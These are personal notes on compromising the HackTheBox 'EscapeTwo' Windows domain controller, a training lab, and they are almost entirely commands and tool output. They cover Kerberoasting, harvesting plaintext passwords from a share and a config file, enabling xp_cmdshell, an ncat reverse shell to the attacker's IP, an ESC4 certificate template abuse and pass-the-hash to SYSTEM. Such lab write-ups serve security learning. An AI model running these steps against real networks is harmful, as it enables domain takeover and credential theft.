Here is my notes on ESCAPETWO box from Hackthebox.
ESCAPETWO: 10.129.201.5
As is common in real life Windows pentests, you will start this box with credentials for the following account: rose / KxEPkKe6R8su
rose:KxEPkKe6R8su
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
bloodhound-python -c All -u rose -p 'KxEPkKe6R8su' -d sequel.htb --dns-tcp -ns 10.129.201.5
BLOODHOUND-DATA:
RYAN -> WriteOwner -> CA_SVC@SEQUEL.HTB:
python3 owneredit.py -action read -target 'ca_svc' 'sequel.htb'/'ryan':'WqSZAF6CysDQbGb3'
python3 owneredit.py -action write -new-owner 'ryan' -target 'ca_svc' 'sequel.htb'/'ryan':'WqSZAF6CysDQbGb3'
python3 owneredit.py -action read -target 'ca_svc' 'sequel.htb'/'ryan':'WqSZAF6CysDQbGb3'
python3 dacledit.py -action 'write' -rights 'FullControl' -principal ryan -target 'ca_svc' 'sequel.htb'/'ryan':'WqSZAF6CysDQbGb3'
net rpc password 'ca_svc' Password -U sequel.htb/ryan%WqSZAF6CysDQbGb3 -S dc01.sequel.htb
crackmapexec smb 10.129.201.5 -d sequel.htb -u ca_svc -p Password
/usr/lib/python3/dist-packages/paramiko/pkey.py:100: CryptographyDeprecationWarning: TripleDES has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.TripleDES and will be removed from this module in 48.0.0.
"cipher": algorithms.TripleDES,
/usr/lib/python3/dist-packages/paramiko/transport.py:259: CryptographyDeprecationWarning: TripleDES has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.TripleDES and will be removed from this module in 48.0.0.
"class": algorithms.TripleDES,
SMB 10.129.201.5 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.129.201.5 445 DC01 [+] sequel.htb\ca_svc:Password
certipy find -stdout -u ca_svc@sequel.htb -p Password -dc-ip 10.129.201.5
certipy find -vulnerable -stdout -u ca_svc@sequel.htb -p Password -dc-ip 10.129.201.5
Template Name = DunderMifflinAuthentication
Certificate Authorities = sequel-DC01-CA
DNS Name : dc01.sequel.htb
ESC4 vulnerability due to Cert Publishers group.
certipy template -dc-ip 10.129.201.5 -u ca_svc -p 'Password' -template DunderMifflinAuthentication -target dc01.sequel.htb -save-old
certipy req -ca sequel-DC01-CA -dc-ip 10.129.201.5 -u ca_svc -p 'Password' -template DunderMifflinAuthentication -target dc01.sequel.htb -upn administrator@sequel.htb
certipy auth -pfx administrator.pfx
certipy auth -pfx administrator.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ff
psexec.py -hashes :7a8d4e04986afa8ed4060f75e5a0b3ff Administrator@10.129.201.5
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 10.129.201.5.....
[-] share 'Accounting Department' is not writable.
[*] Found writable share ADMIN$
[*] Uploading file mqGorRGN.exe
[*] Opening SVCManager on 10.129.201.5.....
[*] Creating service OHrI on 10.129.201.5.....
[*] Starting service OHrI.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.6640]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> hostname
DC01
SYSTEM-SHELL !
C:\Users\Administrator\Desktop> whoami
nt authority\system
C:\Users\Administrator\Desktop> hostname
DC01
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 3705-289D
Directory of C:\Users\Administrator\Desktop
01/04/2025 07:58 AM <DIR> .
01/04/2025 07:58 AM <DIR> ..
01/15/2025 02:21 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 3,521,011,712 bytes free
C:\Users\Administrator\Desktop> type root.txt
[REDIRECTED]
ROOT.TXT: [REDIRECTED]
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-15 14:28:25Z)
┌──(root㉿kali)-[/home/kali/HTB/ESCAPETWO/10.129.201.5]
└─# GetUserSPNs.py -request -dc-ip 10.129.201.5 sequel.htb/rose:KxEPkKe6R8su -request -save -outputfile GetUserSPNS.out
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
----------------------- ------- ---------------------------------------------------- -------------------------- -------------------------- ----------
sequel.htb/sql_svc.DC01 sql_svc CN=SQLRUserGroupSQLEXPRESS,CN=Users,DC=sequel,DC=htb 2024-06-09 07:58:42.689521 2025-01-15 10:22:02.055622
sequel.htb/ca_svc.DC01 ca_svc CN=Cert Publishers,CN=Users,DC=sequel,DC=htb 2025-01-15 14:57:29.059741 2024-06-09 17:14:42.333365
[-] CCache file is not found. Skipping...
┌──(root㉿kali)-[/home/kali/HTB/ESCAPETWO/10.129.201.5]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt GetUserSPNS.out
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:15 DONE (2025-01-15 15:01) 0g/s 951808p/s 1903Kc/s 1903KC/s !!12Honey..*7¡Vamos!
Session completed.
Kerberoast but uncrackable for a moment.
NO ASREPROASTING.
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
|_ssl-date: 2025-01-15T14:29:47+00:00; +18d20h58m01s from scanner time.
ldapsearch -H ldap://10.129.201.5 -x -W -D "rose@sequel.htb" -b "dc=sequel,dc=htb" "objectclass=user" sAMAccountName | grep sAMAccountName | awk -F ":" '{print $2}'
ldapsearch -H ldap://10.129.201.5 -x -W -D "rose@sequel.htb" -b "dc=sequel,dc=htb" '(objectClass=person)' > ldap-people
#Nothing Interesting.
445/tcp open microsoft-ds?
crackmapexec smb 10.129.201.5 -u 'rose' -p 'KxEPkKe6R8su' --shares
/usr/lib/python3/dist-packages/paramiko/pkey.py:100: CryptographyDeprecationWarning: TripleDES has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.TripleDES and will be removed from this module in 48.0.0.
"cipher": algorithms.TripleDES,
/usr/lib/python3/dist-packages/paramiko/transport.py:259: CryptographyDeprecationWarning: TripleDES has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.TripleDES and will be removed from this module in 48.0.0.
"class": algorithms.TripleDES,
SMB 10.129.201.5 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.129.201.5 445 DC01 [+] sequel.htb\rose:KxEPkKe6R8su
SMB 10.129.201.5 445 DC01 [+] Enumerated shares
SMB 10.129.201.5 445 DC01 Share Permissions Remark
SMB 10.129.201.5 445 DC01 ----- ----------- ------
SMB 10.129.201.5 445 DC01 Accounting Department READ
SMB 10.129.201.5 445 DC01 ADMIN$ Remote Admin
SMB 10.129.201.5 445 DC01 C$ Default share
SMB 10.129.201.5 445 DC01 IPC$ READ Remote IPC
SMB 10.129.201.5 445 DC01 NETLOGON READ Logon server share
SMB 10.129.201.5 445 DC01 SYSVOL READ Logon server share
SMB 10.129.201.5 445 DC01 Users READ
sudo lookupsid.py rose@10.129.201.5 | tee usernames
grep SidTypeUser usernames | awk '{print $2}' | cut -d "\\" -f2 > users.txt
┌──(root㉿kali)-[/home/kali/HTB/ESCAPETWO/10.129.201.5]
└─# crackmapexec smb 10.129.201.5 -u 'rose' -p 'KxEPkKe6R8su' -M gpp_autologin
/usr/lib/python3/dist-packages/paramiko/pkey.py:100: CryptographyDeprecationWarning: TripleDES has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.TripleDES and will be removed from this module in 48.0.0.
"cipher": algorithms.TripleDES,
/usr/lib/python3/dist-packages/paramiko/transport.py:259: CryptographyDeprecationWarning: TripleDES has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.TripleDES and will be removed from this module in 48.0.0.
"class": algorithms.TripleDES,
SMB 10.129.201.5 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.129.201.5 445 DC01 [+] sequel.htb\rose:KxEPkKe6R8su
GPP_AUTO... 10.129.201.5 445 DC01 [+] Found SYSVOL share
GPP_AUTO... 10.129.201.5 445 DC01 [*] Searching for Registry.xml
┌──(root㉿kali)-[/home/kali/HTB/ESCAPETWO/10.129.201.5]
└─# crackmapexec smb 10.129.201.5 -u 'rose' -p 'KxEPkKe6R8su' -M gpp_password
/usr/lib/python3/dist-packages/paramiko/pkey.py:100: CryptographyDeprecationWarning: TripleDES has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.TripleDES and will be removed from this module in 48.0.0.
"cipher": algorithms.TripleDES,
/usr/lib/python3/dist-packages/paramiko/transport.py:259: CryptographyDeprecationWarning: TripleDES has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.TripleDES and will be removed from this module in 48.0.0.
"class": algorithms.TripleDES,
SMB 10.129.201.5 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.129.201.5 445 DC01 [+] sequel.htb\rose:KxEPkKe6R8su
GPP_PASS... 10.129.201.5 445 DC01 [+] Found SYSVOL share
GPP_PASS... 10.129.201.5 445 DC01 [*] Searching for potential XML files containing passwords
#NOTHING INTERESTING in SYSVOL.
smbclient \\\\10.129.201.5\\"Accounting Department" -U 'sequel.htb\rose'
Password for [SEQUEL.HTB\rose]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sun Jun 9 10:52:21 2024
.. D 0 Sun Jun 9 10:52:21 2024
accounting_2024.xlsx A 10217 Sun Jun 9 10:14:49 2024
accounts.xlsx A 6780 Sun Jun 9 10:52:07 2024
6367231 blocks of size 4096. 917306 blocks available
smb: \> get accounting_2024.xlsx
getting file \accounting_2024.xlsx of size 10217 as accounting_2024.xlsx (30.5 KiloBytes/sec) (average 30.5 KiloBytes/sec)
smb: \> get accounts.xlsx
getting file \accounts.xlsx of size 6780 as accounts.xlsx (34.7 KiloBytes/sec) (average 32.0 KiloBytes/sec)
accounts.xlsx:
First
Name Last NameEmail UsernamePassword
Angela Martin angela@sequel.htbangela 0fwz7Q4mSpurIt99
Oscar Martinez oscar@sequel.htb oscar 86LxLBMgEWaKUnBG
Kevin Malone kevin@sequel.htb kevin Md9Wlq1E5bZnVDVo
NULL NULL sa@sequel.htb sa MSSQLP@ssw0rd!
oscar:86LxLBMgEWaKUnBG
sa:MSSQLP@ssw0rd!
accounting_2024.xlsx:
Date Invoice Vendor Description Amount Due Date Status Notes
Number
Office
9/6/20241001 Dunder Mifflin Supplies 150$ 01/15/2024Paid
Business Follow
23/08/20241002 Consultancy Consulting 500$ 01/30/2024Unpaid up
Windows Server
7/10/20241003 License Software 300$ 02/05/2024Paid
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-15T14:29:47+00:00; +18d20h58m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-01-15T10:22:07
|_Not valid after: 2055-01-15T10:22:07
|_ssl-date: 2025-01-15T14:29:47+00:00; +18d20h58m01s from scanner time.
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
mssqlclient.py rose:KxEPkKe6R8su@10.129.201.5 -windows-auth
-Nothing interesting about mssql other than enable_xp_cmdshell.
-WORKS !
xp_dirtree hash uncrackable.
┌──(root㉿kali)-[/home/kali/HTB/ESCAPETWO/10.129.201.5]
└─# mssqlclient.py sa:'MSSQLP@ssw0rd!'@10.129.201.5
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL> enable_xp_cmdshell
[*] INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
[*] INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> xp_cmdshell "whoami"
output
--------------------------------------------------------------------------------
sequel\sql_svc
NULL
RCE-ACHIEVED !
Transfer netcat binary to this target though mssql service to gain a shell.
xp_cmdshell "C:\Users\Public\ncat.exe -nv 10.10.14.39 1234 -e CMD"
sudo rlwrap nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.14.39] from (UNKNOWN) [10.129.201.5] 51208
Microsoft Windows [Version 10.0.17763.6640]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
sequel\sql_svc
C:\Windows\system32>hostname
hostname
DC01
USER-SHELL !
PRIV ESC:
SQL_SVC -> RYAN:
findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml
C:\SQL2019\ExpressAdv_ENU>whoami
whoami
sequel\sql_svc
C:\SQL2019\ExpressAdv_ENU>dir
dir
Volume in drive C has no label.
Volume Serial Number is 3705-289D
Directory of C:\SQL2019\ExpressAdv_ENU
01/03/2025 07:29 AM <DIR> .
01/03/2025 07:29 AM <DIR> ..
06/08/2024 02:07 PM <DIR> 1033_ENU_LP
09/24/2019 09:03 PM 45 AUTORUN.INF
09/24/2019 09:03 PM 788 MEDIAINFO.XML
06/08/2024 02:07 PM 16 PackageId.dat
06/08/2024 02:07 PM <DIR> redist
06/08/2024 02:07 PM <DIR> resources
09/24/2019 09:03 PM 142,944 SETUP.EXE
09/24/2019 09:03 PM 486 SETUP.EXE.CONFIG
06/08/2024 02:07 PM 717 sql-Configuration.INI
09/24/2019 09:03 PM 249,448 SQLSETUPBOOTSTRAPPER.DLL
06/08/2024 02:07 PM <DIR> x64
7 File(s) 394,444 bytes
6 Dir(s) 3,527,270,400 bytes free
C:\SQL2019\ExpressAdv_ENU>type sql-Configuration.INI
type sql-Configuration.INI
[OPTIONS]
ACTION="Install"
QUIET="True"
FEATURES=SQL
INSTANCENAME="SQLEXPRESS"
INSTANCEID="SQLEXPRESS"
RSSVCACCOUNT="NT Service\ReportServer$SQLEXPRESS"
AGTSVCACCOUNT="NT AUTHORITY\NETWORK SERVICE"
AGTSVCSTARTUPTYPE="Manual"
COMMFABRICPORT="0"
COMMFABRICNETWORKLEVEL=""0"
COMMFABRICENCRYPTION="0"
MATRIXCMBRICKCOMMPORT="0"
SQLSVCSTARTUPTYPE="Automatic"
FILESTREAMLEVEL="0"
ENABLERANU="False"
SQLCOLLATION="SQL_Latin1_General_CP1_CI_AS"
SQLSVCACCOUNT="SEQUEL\sql_svc"
SQLSVCPASSWORD="WqSZAF6CysDQbGb3" #Ryan Password ?
SQLSYSADMINACCOUNTS="SEQUEL\Administrator"
SECURITYMODE="SQL"
SAPWD="MSSQLP@ssw0rd!"
ADDCURRENTUSERASSQLADMIN="False"
TCPENABLED="1"
NPENABLED="1"
BROWSERSVCSTARTUPTYPE="Automatic"
IAcceptSQLServerLicenseTerms=True
crackmapexec winrm 10.129.201.5 -d sequel.htb -u ryan -p WqSZAF6CysDQbGb3
/usr/lib/python3/dist-packages/paramiko/pkey.py:100: CryptographyDeprecationWarning: TripleDES has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.TripleDES and will be removed from this module in 48.0.0.
"cipher": algorithms.TripleDES,
/usr/lib/python3/dist-packages/paramiko/transport.py:259: CryptographyDeprecationWarning: TripleDES has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.TripleDES and will be removed from this module in 48.0.0.
"class": algorithms.TripleDES,
HTTP 10.129.201.5 5985 10.129.201.5 [*] http://10.129.201.5:5985/wsman
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.129.201.5 5985 10.129.201.5 [+] sequel.htb\ryan:WqSZAF6CysDQbGb3 (Pwn3d!)
sequel.htb\ryan:WqSZAF6CysDQbGb3
WORKS !
evil-winrm -i 10.129.201.5 -u ryan -p WqSZAF6CysDQbGb3
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami
sequel\ryan
*Evil-WinRM* PS C:\Users\ryan\Documents> hostname
DC01
RYAN SHELL !
*Evil-WinRM* PS C:\Users\ryan\Desktop> whoami
sequel\ryan
*Evil-WinRM* PS C:\Users\ryan\Desktop> hostname
DC01
*Evil-WinRM* PS C:\Users\ryan\Desktop> dir
Directory: C:\Users\ryan\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 1/15/2025 2:21 AM 34 user.txt
*Evil-WinRM* PS C:\Users\ryan\Desktop> type user.txt
[REDIRECTED]
USER.TXT: [REDIRECTED]
#Go to BLOODHOUND-DATA section for continutation of ryan user.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
|_ssl-date: 2025-01-15T14:29:47+00:00; +18d20h58m01s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
|_ssl-date: 2025-01-15T14:29:47+00:00; +18d20h58m01s from scanner time.
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 18d20h58m00s, deviation: 0s, median: 18d20h58m00s
| smb2-time:
| date: 2025-01-15T14:29:06
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
PORT STATE SERVICE
53/udp open domain
123/udp open ntp